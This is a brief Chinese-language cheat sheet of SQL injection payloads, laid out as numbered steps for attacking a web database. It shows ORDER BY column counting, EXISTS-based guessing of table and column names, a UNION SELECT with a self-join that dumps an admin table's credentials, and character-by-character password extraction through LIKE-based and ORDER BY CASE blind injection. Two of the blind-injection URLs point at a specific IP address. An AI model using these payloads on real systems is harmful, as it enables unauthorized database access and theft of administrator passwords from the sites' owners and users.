1 先查当前文章字段 :
order by 11 //以多少字段排序 正常的最大的那个就是字段数
2 猜表名
and exists(select * from admin) //猜有无 admin
3 猜表中字段
and exists(select * from admin order by 4) //找出admin 字段
4 不知道admin中其他字段 去得到密码
and 1=2 union select 1,2,3,* from admin as a inner join admin as b on a.id=b.id //admin为4个字段 总共11字段 11-4*2 = 3 这样在页面上出现admin 和密码
5 搜索行 字符注入
'%xxxxx%'
%' and (select top 1 asc(mid(pass,1,1)) from manager)=84 and '%'=' 84// manager 是表名 pass是列名 都是猜的 先猜表名 再猜字段名
6
http://222.18.158.62:8080/2/index1.php?order_by=(case when ((select length(password) from admin where id=1) >=8) then id else user end) //判断有几位
http://222.18.158.62:8080/2/index1.php?order_by=(case when (ord(mid((select password from admin where id=1),1,1))>=51) then id else user end) //判断第几位